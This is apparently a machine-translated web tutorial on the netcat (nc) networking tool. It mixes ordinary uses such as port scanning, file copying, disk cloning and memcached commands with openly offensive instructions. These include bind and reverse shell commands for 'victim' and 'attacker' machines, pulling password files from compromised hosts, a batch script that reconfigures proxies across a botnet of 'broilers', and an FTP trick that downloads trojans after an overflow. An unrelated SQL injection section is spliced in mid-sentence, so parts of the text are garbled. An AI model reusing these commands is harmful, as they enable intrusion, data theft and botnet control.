Summary of Linux nc command

NC's full name is Netcat (Network Knife), and its author is Hobbit && ChrisWysopal. It is famous for its powerful functions and compact size, and is also known as the "Swiss Army Knife". nc - TCP/IP Swiss Army Knife

nc is often used for overflow, backlinks, uploading text, etc. It is actually a non-standard telnet client program. It is also a putty.exe client program.

socat is a replacement for nc, which can be called nc++. It is an N-fold enhanced version of netcat. Socat supports many connection methods, including ip, tcp, udp, ipv6, pipe, exec, system, open proxy, openssl, etc.

Function description: Powerful network tool

Syntax: nc [-hlnruz][-g<gateway...>][-G<number of pointers>][-i<delay seconds>][-o<output file>][-p<communication port>]
[-s<source address>][-v...][-w<timeout seconds>][host name][communication port...]

parameter:
-g<gateway> Set the router hop communication gateway, up to 8 can be set.
-G <number of pointers> Set the source routing pointer, whose value is a multiple of 4.
-h Online help.
-i<delay in seconds> Set the time interval for sending information and scanning communication ports.
-l Listen mode, for inbound connections (listen on local port).
-n Use the IP address directly without going through a domain name server.
-o<output file> specifies the file name and dumps the transmitted data into the file in hexadecimal code for storage.
-p<communication port> Set the communication port used by the local host.
-r Randomly specify the communication port between the local and remote hosts.
-s<source address> Set the IP address of the local host to send data packets.
-u Use UDP transport protocol.
-v displays the command execution process.
-w<timeout seconds> Set the time to wait for the connection.
-z Use 0 input/output mode, only used when scanning communication ports.

[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22

1) Port Scanning

nc -v -z host.example.com 70-80 #Scan ports (70 to 80), you can specify a range. -v Output detailed information.
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24 # You can also try it without the -z parameter nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused

[email protected]:~# nc -v -z -w2 127.0.0.1 1-100
[email protected]:~# nc -v -w 10 10.1.1.180 80
[email protected]:~# nc -v -w 10 10.1.1.180 -z 80-30000

# Listen to local port [email protected]:~# nc -l -p 1234 
[email protected]:~# netstat -tunlp | grep 1234
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 15543/nc

# Test UDP port [email protected]:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name  
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1111/sshd      
udp 0 0 0.0.0.0:68 0.0.0.0:* 887/dhclient

[email protected]:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!

nc -p 1234 -w 5 host.example.com 80

Establish a connection from local port 1234 to port 80 of host.example.com with a timeout of 5 seconds

nc -u host.example.com 53

u is UDP connection

2) Remotely copy files

Copy the file from server1 to server2.

First, use nc to activate monitoring on server2, and run on server2:

[root@hatest2 tmp]# nc -lp 1234 > install.log

Run on server1:

[root@hatest1 ~]# ll install.log
-rw-r--r-- 1 root root 39693 December 20, 2007 install.log 
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

Destination host monitoring

nc -l listening port > file name to receive nc -l 4444 > cache.tar.gz

The source host initiates the request

nc destination host ip destination port nc 192.168.0.85 4444

netstat is as follows

[root@localhost jiangbao]# netstat -tpln
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 18166/nc

Directory Transfer

Copy the contents of the nginx-0.6.34 directory from server1 to server2.

First, use nc to activate monitoring on server2, and run on server2:

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -

Run on server1:
[

root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf - nginx-0.6.34|nc 192.168.228.222 1234

Copy files from 192.168.2.33 to 192.168.2.34

On 192.168.2.34: nc -l 1234 > test.txt

On 192.168.2.33: nc 192.168.2.34 < test.txt

Clone a hard drive or partition

The operation is similar to the copy above. You only need to use dd to obtain the data of the hard disk or partition and then transfer it.

The operation of cloning a hard disk or partition should not be performed on a mounted system.

Therefore, you need to use the installation CD to boot, enter the rescue mode (or use the Knoppix tool CD) to start the system, and then perform similar monitoring actions on server2:

# nc -l -p 1234 | dd of=/dev/sda

Execute the transfer on server1 to complete the task of cloning the sda ​​hard disk from server1 to server2:

# dd if=/dev/sda | nc 192.168.228.222 1234

3) Simple chat tool

On 192.168.2.34: nc -l 1234

On 192.168.2.33: nc 192.168.2.34 1234

In this way, both parties can communicate with each other. Use ctrl+C (or D) to exit.

nc -l 1234
nc 127.0.0.1 1234

Establish a connection on port 1234 and send input to each other

4) Save the web page

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5) Simulating HTTP Headers

[root@hatest1 ~]# nc www.linuxfly.org 80 GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browser
HTTP/1.1 200 OK Date: Tue, 16 Dec 2008 07:23:24 GMT Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/ Expires: 0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Cache-Control: private, post-check=0, pre-check=0, max-age=0 Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html [......]

After the nc command, enter the content in red and press Enter twice to get the HTTP Headers content from the other party.

echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80

Connect to the host and execute

6) Use nc command to operate memcached
1) Store data: printf "set key 0 10 6rnresultrn" |nc 192.168.2.34 11211
2) Get data: printf "get keyrn" |nc 192.168.2.34 11211
3) Delete data: printf "delete keyrn" |nc 192.168.2.34 11211
4) Check the status: printf "statsrn" |nc 192.168.2.34 11211
5) Simulate the top command to check the status: watch "echo stats" |nc 192.168.2.34 11211
6) Clear the cache: printf "flush_allrn" |nc 192.168.2.34 11211 (be careful, the cache will be gone if it is cleared)

Supplementary Tutorial 2

How to use nc

Netcat is known as the 'Swiss Army Knife' of network security. I believe everyone knows it...

A simple but useful tool to read and write data over a network connection using TCP or UDP protocols. It is designed to be a stable backdoor tool that can be easily driven directly by other programs and scripts. At the same time, it is also a powerful network debugging and detection tool that can establish almost all types of network connections you need, and has several interesting built-in functions (see the usage below for details). There are two versions of its WINDOWS version in China, one is the original version written by the original author Chris Wysopal, and the other is the new 'condensed' version compiled by 'Red and Black'. The 'condensed' version of the main program is only more than 10KB (the 10KB NC cannot complete the 4th and 5th methods of use mentioned below. The original NC with this function seems to be 60KB: P). Although the "size" is small, it can complete a lot of work.

Software Introduction:
Tool name: Netcat
Author: Hobbit && Chris Wysopal
Website: http://www.atstake.com/research/tools/network_utilities/
Category: Open Source Platform: Linux/BSD/Unix/Windows
WINDOWS version number: [v1.10 NT]

Parameter introduction:

You can see how to use each parameter by running nc.exe -h.
Basic format: nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d background mode
-e program redirection, once connected, it will be executed [DANGER!!]
-g gateway source-routing hop point[s], up to 8 Set the router hop communication gateway. Up to 8 can be set.
-G num source-routing pointer: 4, 8, 12, ... Set the source routing pointer to a multiple of 4.
-h Help information
-i secs delay interval
-l Listening mode, for inbound connections (listening on local ports)
-L Continue to listen after the connection is closed
-n specifies a numeric IP address, not a hostname. That is, use the IP address directly without going through the domain name server.
-o file specifies the file name and dumps the transmitted data into the file in hexadecimal format.
-p port local port number (specify local port)
-r Random local and remote ports
-s addr local source address
-t Use TELNET interactive mode (respond with telnet)
-u UDP mode
-v Verbose output -- use two -v ( -vv ) to get more detailed information. Get port information
-w secs timeout
-z turns off input and output -- only for scanning. Ports can be written in MN range format.

Basic usage:

There are probably the following usages:

1) Connect to the remote host, example:
Format: nc -nvv 192.168.xx 80
Explanation: Connect to TCP port 80 of 192.168.xx
2) Listen to the local host, example:
Format: nc -l -p 80
Explanation: Listen to TCP port 80 of this machine
3) Scan remote host, example:
Format: nc -nvv -w2 -z 192.168.xx 80-445
Explanation: Scan all ports from TCP80 to TCP445 of 192.168.xx
4) Remote host binding shell, example:
Format: nc -l -p 5354 -t -ec:winntsystem32cmd.exe
Explanation: Bind the CMDSHELL of the REMOTE host to the TCP5354 port of the REMOTE host
5) The REMOTE host binds to the SHELL and connects reversely, example:
Format: nc -t -ec:winntsystem32cmd.exe 192.168.xx 5354
Explanation: Bind the CMDSHELL of the REMOTE host and reversely connect to the TCP5354 port of 192.168.xx. The above are the most basic uses (in fact, there are many other uses of NC. When combined with pipe commands "|" and redirection commands "<", ">", etc., the command functions are more powerful...).
Advanced usage:
6) Used as an attack program, example:
Format 1: type.exe c:exploit.txt|nc -nvv 192.168.xx 80
Format 2: nc -nvv 192.168.xx 80 < c:exploit.txt
Explanation: Connect to port 80 of 192.168.xx and send the contents of c:exploit.txt in its pipeline (the two formats have the same effect, they are really similar in nature:P)
Attachment: c:exploit.txt is shellcode, etc.
7) Used as a honeypot[1], example:
Format: nc -L -p 80
Explanation: Use -L (note that L is capitalized) to continuously monitor a port until ctrl+c is pressed.
8) Used as a honeypot[2], example:
Format: nc -L -p 80 > c:log.txt
Explanation: Use -L to continuously monitor a port until you press ctrl+c, and output the results to c:log.txt. If you change '>' to '>>', you can append the log.
Attachment: c:log.txt is the log, etc.
9) Used as a honeypot [3], for example:
Format 1: nc -L -p 80 < c:honeypot.txt
Format 2: type.exe c:honeypot.txt|nc -L -p 80
Explanation: Use -L to continuously monitor a port until ctrl+c is pressed, and send the contents of c:honeypot.txt into the pipe.
If the attacker knows that the application will use the content entered in the form directly for the authentication query, he will try to enter some special SQL strings to tamper with the query and change its original function.
Trick the system into granting access. The damage that an attacker may cause varies depending on the system environment, which is mainly determined by the security permissions of the application to access the database.
If the user's account has administrator or other high-level permissions, the attacker may be able to perform any operations he wants on the database tables.
This includes adding, deleting, or updating data, and possibly even directly deleting the table.

2. How to prevent it?

Fortunately, it is not particularly difficult to prevent ASP.NET applications from being attacked by SQL injection. All you need to do is filter all the input content before constructing SQL commands using the content entered in the form. Filtering input can be done in a number of ways.

(1) For situations where SQL queries are constructed dynamically, the following techniques can be used:

First: Replace single quotes, that is, change all single quotes that appear alone into two single quotes to prevent attackers from modifying the meaning of SQL commands. Looking at the previous example again, "Select * from Users Where login = or 1=1 AND password = or 1=1" will obviously get different results from "Select * from Users Where login = or 1=1 AND password = or 1=1".

Second: Delete all hyphens in the user input to prevent attackers from constructing queries such as "Select * from Users Where login = mas -- AND password =", because the second half of such queries has been commented out and is no longer valid. As long as the attacker knows a valid user login name, he or she does not need to know the user's password to gain access.

Third: Limit the permissions of the database account used to execute queries. Perform query, insert, update, delete operations with different user accounts. Since the operations that can be performed by different accounts are isolated, it prevents the place originally used to execute the Select command from being used to execute the Insert, Update, or Delete command.

⑵ Use stored procedures to execute all queries. The SQL parameters are passed in a way that prevents attackers from exploiting single quotes and hyphens. In addition, it allows database permissions to be restricted to only allow specific stored procedures to execute, and all user input must comply with the security context of the called stored procedure, making injection attacks difficult to occur.

⑶ Limit the length of form or query string input. If the user's login name is only 10 characters at most, do not recognize more than 10 characters entered in the form, as this will greatly increase the difficulty for attackers to insert harmful code into SQL commands.

⑷ Check the legitimacy of user input and make sure that the input content contains only legal data. Data checking should be performed on both the client and server sides - the reason for performing server-side validation is to make up for the weak security of the client-side validation mechanism.

On the client side, it is entirely possible for an attacker to obtain the source code of a web page, modify the script that verifies the legitimacy (or simply delete the script), and then submit the illegal content to the server through the modified form. Therefore, the only way to ensure that the validation operation has actually been performed is to perform the validation on the server side as well. You can use many built-in validation objects, such as RegularExpressionValidator, which can automatically generate client-side scripts for validation, and of course you can also insert server-side method calls. If you can't find a ready-made validation object, you can create one yourself through CustomValidator.

⑸ Encrypt and save user login name, password and other data. Encrypting the data entered by the user and then comparing it with the data stored in the database is equivalent to "disinfecting" the data entered by the user. The data entered by the user no longer has any special meaning to the database, thereby preventing attackers from injecting SQL commands. The System.Web.Security.formsAuthentication class has a HashPasswordForStoringInConfigFile that is perfect for sanitizing input data.

⑹ Check the number of records returned by the query that extracts data. If the program requires only one record to be returned, but more than one row of records is actually returned, it is treated as an error.

nc -l -v -p 7626

Open the local port 7626 for listening and feedback the connection information.

If someone scans for the Iceberg Trojan, they will think that you have been infected with the Trojan and have opened 7626, which is a bit similar to the function of "Piggy Run". If you add a batch file to use it together, it will become a "pig run".

nc -l -p 80 >>c:\\log.dat 

If you want to monitor whether there is any intrusion into the local port 80 and write it down, use this command. In this way, any attack on port 80 of this machine will be recorded.

nc -l -p 123 -e cmd.exe or: nc -l -p 123 -t

If you have access to someone else's machine through overflow, you can run the above command. The function is to use cmd.exe to respond to the connection to port 123 on the machine.

This turns the overflowed host into a telnet zombie. You can also use commands to let the brute force actively connect to your host, assuming my IP is 192.168.0.1

Run on the brute force machine: nc -e cmd.exe 192.168.0.1 777 . Then run on the local machine: nc -l -p 777

It means that the bot will actively respond cmd.exe (a shell) to port 777 of your computer. You then listen to port 777 on the local machine, and you will enter the other party's cmd.

This is also the principle of the rebound port Trojan.

nc -v 192.168.0.25 80

Get the information of port 80 of 192.168.0.25. You can get a lot of important information such as IIS version

nc -v -z 192.168.0.25 1-100

Scan TCP ports between 1 and 100 on 192.168.0.25

nc -v -z -u 192.168.0.25 1-100

This is to scan UDP ports between 1 and 00

nc -vv ip port //Port detection:
RIVER [192.168.0.198] 19190 (?) open //Show whether it is open

scanner

nc -vv -w 5 ip port-port port 
nc -vv -z ip port-port port

Such scans will leave a lot of traces, and system administrators will be extra careful.

back door

victim machine: // victim's machine nc -l -p port -e cmd.exe // win2000 
nc -l -p port -e /bin/sh // unix,linux 
attacker machine: // attacker's machine. 
nc ip -p port // Connect to victim_IP and get a shell.

Reverse Connection

attacker machine: //Usually sql2.exe, remote overflow, webdavx3.exe attack. 
//Or the reverse connection of wollf. 
nc -vv -l -p port 
victim machine: 
nc -e cmd.exe attacker ip -p port 
nc -e /bin/sh attacker ip -p port

or:

attacker machine: 
nc -vv -l -p port1 
nc -vv -l -p prot2 
victim machine: 
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2 
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

139 needs to add the parameter -s (nc.exe -L -p 139 -d -e cmd.exe -s other machine IP), so that nc.exe takes precedence over NETBIOS.

Transfer files:

attacker machine <-- victim machine //Drag the password file back from the zombie machine. 
nc -d -l -p port < path\filedest can be executed in shell nc -vv attacker_ip port > path\file.txt needs Ctrl+C to exit // The zombie needs to be executed in cmd.exe of gui interface (terminal login, not as convenient as installing FTP). Otherwise, there is no way to enter Crrl+C.
attacker machine --> victim machine //Upload command file to the zombie machine nc -vv -l -p port > path\file.txt Need to Ctrl+C to exit nc -d victim_ip port < path\filedest Can be executed by shell //This is better. We log in to the terminal. Invade other zombie machines. You can choose shell mode to log in.

Port data capture.

nc -vv -w 2 -o test.txt xfocus.Net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error 
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr 
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... 
< 00000084 83 00 00 01 8f # .....

telnet, automatic batch processing.

nc victim_ip port < path\file.cmd shows the execution process. 
nc -vv victim_ip port < path\file.cmd shows the execution process.
nc -d victim_ip port < path\file.cmd Quiet mode.
_______________file.cmd________________________ 
password 
cd %windir% 
echo []=[%windir%] 
c: 
cd \ 
md test 
cd /d %windir%\system32\ 
net stop sksockserver 
snake.exe -config port 11111 
net start sksockserver 
exit 
_______________file.cmd__END___________________

########################################
Manage broilers and change broiler settings
########################################

1) For example, if you want to uniformly change the proxy port on the botnet, change snake.exe to 11111, service name "sksockserver", and use the winshell backdoor. Port 1234 password password

The command format is:

modi.bat youip.txt
___________modi.bat____________________________ 
@if "%1"=="" echo Error: no ip.txt &&goto END
:start 
@echo password >a.cmd 
@echo s >>a.cmd 
@echo cd /d %%windir%%\system32\ >>a.cmd 
@net stop "sksockserver" >>a.cmd 
@snake.exe -config port 11111 >>a.cmd 
@net start "sksockserver" >>a.cmd 
@exit >>a.cmd
:auto 
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END 
___________modi.bat__END_______________________

2)

@echo off 
color f0 
:start 
cls 
C:\nc -vv -w 3 -l -p 80>>80.txt 
goto start

After turning off the firewall and running this batch process, you will monitor a lot of information about detecting U vulnerabilities, mostly in groups of three - Nimda virus scanning you.
This will produce broiler chickens. Although the quality is not high, it is also a cheap method.

Broiler characteristics:
1. unicode vulnerability
2. The guest password is empty, the administrators group user
3. Other vulnerabilities are used to transfer files — ncp

#!/bin/sh 
## Similar to rcp, but with netcat on a high port ## Do "ncp targetfile" on the receiving machine 
## Do "ncp sourcefile receivinghost" on the machine sending the file 
## If "nzp" is called, the transferred file will be compressed ## Define the port you want to use here, you can freely choose MYPORT=23456
## If nc is not in the system path, uncomment the following line and modify it # PATH=$:$ ; export PATH
## The following lines check the parameter input:
test "$3" && echo "too many args" && exit 1 
test ! "$1" && echo "no args?" && exit 1 
me=`echo $0 | sed s+.*/++` 
test "$me" = "nzp" && echo [compressed mode]
# if second arg, its a host to send an [extant] file to. 
if test "$2" ; then 
test ! -f "$1" && echo "cant find $1" && exit 1 
if test "$me" = "nzp" ; then 
  compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0 
else 
  nc -v -w 2 $2 $MYPORT < "$1" && exit 0 
fi 
echo "transfer FAILED!" 
exit 1 
fi
# Is there a file with the same name in the current directory of the receiving machine if test -f "$1" ; then 
echo -n "Overwrite $1?" 
read aa 
test ! "$aa" = "y" && echo "[punted!]" && exit 1 
fi 
# 30 seconds oughta be pleeeeenty of time, but change if you want. 
if test "$me" = "nzp" ; then 
# Note the usage of nc here, combining redirection symbols and pipes nc -v -w 30 -p $MYPORT -l < ​​/dev/null | uncompress -c > "$1" && exit 0 
else 
nc -v -w 30 -p $MYPORT -l < ​​/dev/null > "$1" && exit 0 
fi 
echo "transfer FAILED!" 
# clean up, since even if the transfer failed, $1 is already trashed 
rm -f "$1" 
exit 1

In this case, I only need to QuackA# ncp ../abcd on machine A first

Then on another machine B

QuackB#ncp abcd 192.168.0.2 
quackb [192.168.0.1] 23456 (?)

Appears on A

open connect to [192.168.0.2] from quackb [192.168.0.1] 1027 
# Check to see that the file transfer is complete.

===========================================================================
[Local operation] nc -v ip port
[Command Explanation] Scan a port of a certain IP and return detailed output information.
===========================================================================
[Local operation] nc -v -z ip port-port
[Command Explanation] Scan the port of a certain IP to a certain port, and return detailed information output, but the scanning speed is slow.
===========================================================================
[Local operation] nc -v -z -u ip port-port
[Command Explanation] Scan a certain UDP port of a certain IP to a certain UDP port, and return detailed information output, but the scanning speed is slow.
===========================================================================
[Local operation] nc -l -p 80
[Command Explanation] Open the local TCP port 80 and listen.
===========================================================================
[Local operation] nc -l -v -p 80
[Command Explanation] Open the local TCP port 80 and output the monitored information to the current CMD window.
===========================================================================
[Local operation] nc -l -p 80 > E:/log.dat
[Command Explanation] Open the local TCP port 80 and output the monitored information to the log file under E:/log.dat.
===========================================================================
[Local operation] nc -nvv 192.168.1.101 80
[Command Explanation] Connect to port 80 of the host 192.168.1.101.
===========================================================================
[Local operation] nc -nvv -w2 -z 192.168.1.101 80-1024
[Command Explanation] Scan ports 80-1024 of 192.168.1.101, and the connection timeout is 2 seconds.
===========================================================================
[Remote operation] nc -l -p 2012 -t -e cmd.exe
[Local operation] nc -nvv 192.168.1.101 2012
[Command Explanation] Use the forward connection method. Run nc -l -p 2012 -t -e cmd.exe on the remote host (Note: assuming the IP address is 192.168.1.101), which means binding the remote host's CMD to [Command Explanation] port 2012. When the local host successfully connects to the remote host, a CMD Shell will be returned to the local host; run nc -nvv 192.168.1.101 2012 on the local host for [Command Explanation] to connect to the remote host that has redirected CMD to port 2012 (Note: assuming the IP address is 192.168.1.101).
===========================================================================
[Local operation] nc -l -p 2012
【Remote operation】nc -t -e cmd.exe 192.168.1.102 2012
[Command Explanation] Use the reverse connection method. First run nc -l -p 2012 on the local host to open the local host's (Note: assuming the IP address is 192.168.1.102) port 2012 and listen for the remote host [Command Explanation] connection; run nc -t -e cmd.exe 192.168.1.102 2012 on the remote host to redirect the remote host's CMD to the host with IP address 192.168.1.102 and port number 2012. After the connection is successful, the host with IP address 192.168.1.102 will get a CMD Shell.
===========================================================================
[Local operation] nc -v -n ip port < C:/sunzn.exe
【Remote operation】nc -v -l -p port > D:/sunzn.exe
[Command Explanation] Running nc -v -n ip port < C:/sunzn.exe locally means reading the contents of the sunzn.exe file from the root directory of the local C drive and sending these data to the corresponding port of the remote host (Note: the IP in the command line is the IP of the remote host receiving the file). Running nc -v -l -p port > D:/sunzn.exe on the remote host means listening to the corresponding port and writing the received information data to D:/sunzn.exe. These two lines of commands realize the transmission of files between the local host and the remote host.
===========================================================================
[Local operation] nc -L -p 8989<C:\ftp.txt (ftp.txt is the FTP automatic download command)
[Command Explanation] Keep listening to port 8989, and send the content in C:\ftp.txt to any host connected to port 8989 of this machine, which can transfer files (this usage is often used for reverse [Command Explanation] overflow). When a remote host overflows, once the overflowed remote host connects to port 8989 of the local host, the remote host will automatically use FTP to download the specified file, such as a Trojan horse.
===========================================================================

Simple usage tutorial:

Command 1: Listening command

  nc -l -p port
  nc -l -p port > e:\log.dat
  nc -l -v -p port

Parameter explanation:
-l: Listening port, listening for inbound information
-p: followed by the local port number
-v: Display port information. If -vv is used, more detailed information about the port will be displayed.

Tip: Generally everyone likes to use -vv

nc -l -p 80 //This is very simple, listening to port 80. If this command is run on the machine, port 80 is considered open and can fool the scanner.
nc -l -p 80 > e:\log.dat //Write detailed information to the log file log.dat on disk E
nc -l -v -p 80 //Similar to the above command, the information will be directly displayed on the screen running NC.

practice:

For example: nc -l -v -p 80

Then enter the local IP in the browser: 127.0.0.1

Command 2: Program Direction (Method of Rebound Shell)

nc -l -p port -t -e cmd.exe

Local machine: nc -l -p port or nc -l -v -p port
Target machine: nc -e cmd.exe ip port

Parameter explanation:
The two parameters -l and -p have been explained.
-e; the function is program orientation
-t: Reply in the form of telnet

example

nc -l -p 5277 -t -e cmd.exe  
 // Never run it on your own machine. If you do, your machine will become a TELNET server.

Command Explanation:

Listen for incoming information on local port 5277, and redirect the CMD.exe program to port 5277. When someone connects, let the CMD.exe program respond to the connection request in the form of TELNET. To put it simply, it actually makes it a TELNET zombie, so this command must be run on your zombie.

Example usage:

local machine: nc -l -p port ( or nc -l -v -p port )
Remote machine: nc -e cmd.exe ip port

Everyone knows Gray Pigeon and Thief, right? Both tools use the rebound port type Trojan.

What is a bounce port?

That is to say, when the other party is infected, you do not need to actively connect to the other party, that is, you do not need to send a connection request from your client to the server running on the other party's host. Instead, the other party will actively connect to you. This can make many firewalls ineffective because many firewalls do not check outbound requests.

When these two commands are combined here, they can be said to have the same effect as those two Trojans.

Local operation: nc -l -p 5277 (listen to local port 5277) or nc -l -v -p 5277

Then on the remote machine, try to run nc -e cmd.exe ip 5277

(Don’t really type “ip” on the brute force machine) You should type it like xxx.xxx.xxx.xxx! !

This is a rebound ~~Get a SHELL on the local machine

Command 3: Scan ports

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port

Parameter explanation:

-z: Turn off input and output, used when scanning

nc -v ip port  

//This command is to scan a certain port

For example:

nc -v ip 135  
//Scan port 135 of the remote host to obtain some simple information about the port, but for some ports, we can also obtain more information

For example: port 80

nc -v ip 80 Then use the get method to obtain the other party's WEB server information

nc -v -z ip port-port  
 //This command is used to scan TCP ports quickly, and port-port specifies the port range to scan.

For example:

nc -v -z ip 1-200  
//You can see the open status of TCP ports 1-200 on my machine nc -v -z -u ip port-port  
//This command has an additional -u parameter than the previous command. The function of this command is still to scan ports, but there is an additional -u parameter, which is used to scan UDP ports

For example:

nc -v -z -u ip 1-200 //This command will scan UDP ports 1-200

Command 4: Transfer files (HOHO, I LIKE)

LOCAL MACHINE: nc -v -n ip port < x:\svr.exe
REMOTE MACHINE: nc -v -l -p port > y:\svr.exe

Parameter explanation:

-n: Specify a numeric IP address

These two commands are combined to transfer files

First, run the command on the remote machine:

nc -v -l -p 5277 > c:\pulist.exe

Do you remember this command? Haha, isn't it a bit similar to the monitoring command? Yes, that's right, this is monitoring port 5277

And write the received information data to c:\pulist.exe

Now run on the local machine

nc -v -n ip 5277 < e:\hack\pulist.exe

This command means reading the contents of the pulist.exe file from the local E drive and directory, and sending this data to port 5277 of the IP address.

This will automatically create a pulist.exe file on the remote host.

The above is the full content of this article. I hope it will be helpful for everyone’s study. I also hope that everyone will support 123WORDPRESS.COM.